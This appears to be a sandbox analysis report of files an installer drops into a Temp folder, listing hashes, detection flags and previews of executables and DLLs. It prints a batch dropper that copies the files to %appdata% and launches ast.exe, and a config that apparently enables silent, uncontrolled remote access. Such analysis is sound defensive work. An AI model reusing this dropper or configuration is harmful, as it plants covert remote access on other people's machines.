                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):33
                                                                                                                                          Entropy (8bit):4.923181998146335
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:fDzSrwCPEmi6W:rzzd6W
                                                                                                                                          MD5:E7B7A51B0FA1328CFFC285B39D7C2864
                                                                                                                                          SHA1:1785D6B29F096399A7AEC2B36A6A7E7716723053
                                                                                                                                          SHA-256:E1F0D335E3DCE44B73A9902C158ECA7C4EC9C57C2DD7DFE3D9D1279F2C4B0D77
                                                                                                                                          SHA-512:7133E09AFCABC36FC734DD0A0BC5B64FA27E0FBF7F37AF458411A6C3D0DEFF41FCE9E54C582383307538B7F5F01B16B913F0B1CAC08F0EA9F0B4E4CA6805904E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..f8.7..N...z'.s=.3..=....w...UDe

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):465
                                                                                                                                          Entropy (8bit):4.684149132947556
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hmR9oa39T4h+dspB929c2dceR0n1tcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvBN:w753d48daBVn17jfxmfJ8FQwH
                                                                                                                                          MD5:83B5833A435D05A04AC59744600DE4B7
                                                                                                                                          SHA1:ABE722BCC9DA288E76931962EF225EEB10BA1534
                                                                                                                                          SHA-256:B70F9730CC0796164698E9311AFBBDB95566149A7B542FE8E449F928DA239154
                                                                                                                                          SHA-512:FFA3A85AC112A622B5DC322CFF24197903B8D31D6ECAC265E02C92784693B3DFB76773545C5AB5C77FD64BF1482BEB9BC89D11392FADA662E09C0EF4099EAD8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@echo off..set "StartDirName=template" ..set "TempDirName=u7i3kw" ..set "BatchName=9vsl3c.bat" ..set "ProcName=ast.exe" ....if exist "%appdata%\StartDirName" (..goto end..) else (..mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..)..:end..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\AstCrp.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172216
                                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\ast.exe (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):7543992
                                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):581304
                                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1724088
                                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17648
                                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\config.ini (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):586
                                                                                                                                          Entropy (8bit):5.203397968860563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                          MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                          SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                          SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                          SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\exn5epb.bmp (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x272, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5802
                                                                                                                                          Entropy (8bit):7.930078612894882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:WnjHA1+9wxNAwaf886RfeyZH+5sJCf9ZN2Lzr7wnJIbp8Gj7S2ZchDqDdZyt7JlK:yVMQM1TeSJCf9Kr7wnJIbGGjtA+KJlOH
                                                                                                                                          MD5:AD245BDEA321CE2B299310DE0B7140A3
                                                                                                                                          SHA1:B98EE537F4BAA319F74BEC31D00A8F0B9621854C
                                                                                                                                          SHA-256:D2A83207A65620B133BABAE9D8E4595EB5556F4FC063CF41A552D664E0865C4B
                                                                                                                                          SHA-512:1F4D9994397D10EF3879ED5F7C1F85129E2644E0C6B243E920ED5C4623082865911B1255A577BFFAF035EB6F3E41DE6E4CD7B7D354C64F097891B965C18CBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......JFIF..................................................!.%..+!..&8&+/1555.$;@=3?.451...........4!!+14414444444644144444444444441414444444444444444444..........."........................................;.........................!.1A.."2QaqB..R..#br..3......S..............................#.....................!..1"AQ..2aq............?....1JK+.H.....zrQa..."..u.4`..........C........C..B($%........#..@E..V.(.a...&...FMh.L..X..W.....LQ.@L.V...A......V.Ee.(."..Lp$G...9....b/..>.m.'TI0..C..C....Q.6.V..DZX...D.S.y..^.5..#.-L...#.T.x.}4..?5..E...I.=.pV....OB.....0.....p.ux-.Y.....QQG._.R...G..|E............a..pG%......Q.6.......I..(.W._.9....A..U....U.{.Fzk.....tv.Q.:.:0.)....?..Z..q...^...~...2.."..G{@.5h.jk...Jl<...i...vS....&..W.....7......A........j......./....?i.*.-......v..p<7.nC./s.....T.qv..[.......>.e.W.....S..7..7.....,-n.q..R..*.......?.7Z..Yg.R...T.6~..ES..q......Yo.....:.....T8..R*..T..%D..U..Q....&^..Bq.qR.......B.T...[.5{.....1....X..;

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2236144
                                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1388688
                                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172216
                                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):581304
                                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17648
                                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-9LAME.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):465
                                                                                                                                          Entropy (8bit):4.684149132947556
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hmR9oa39T4h+dspB929c2dceR0n1tcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvBN:w753d48daBVn17jfxmfJ8FQwH
                                                                                                                                          MD5:83B5833A435D05A04AC59744600DE4B7
                                                                                                                                          SHA1:ABE722BCC9DA288E76931962EF225EEB10BA1534
                                                                                                                                          SHA-256:B70F9730CC0796164698E9311AFBBDB95566149A7B542FE8E449F928DA239154
                                                                                                                                          SHA-512:FFA3A85AC112A622B5DC322CFF24197903B8D31D6ECAC265E02C92784693B3DFB76773545C5AB5C77FD64BF1482BEB9BC89D11392FADA662E09C0EF4099EAD8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@echo off..set "StartDirName=template" ..set "TempDirName=u7i3kw" ..set "BatchName=9vsl3c.bat" ..set "ProcName=ast.exe" ....if exist "%appdata%\StartDirName" (..goto end..) else (..mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..)..:end..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2098416
                                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
